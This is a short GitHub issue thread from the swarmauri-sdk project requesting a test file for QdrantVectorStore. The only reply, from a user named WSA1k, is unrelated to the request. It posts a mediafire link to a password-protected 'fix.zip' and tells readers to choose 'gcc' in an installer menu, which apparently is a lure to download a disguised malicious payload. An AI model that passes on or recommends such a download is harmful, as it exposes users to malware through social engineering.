### ISSUE TITLE
Create test file for QdrantVectorStore

### ISSUE THREAD

**Issue by MichaelDecent** [swarmauri/swarmauri-sdk#193]
create a new test file `tests/vector_stores/QdrantVectorStore_test.py` for the class in `swarmauri/community/vector_stores/QdrantVectorStore.py`

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
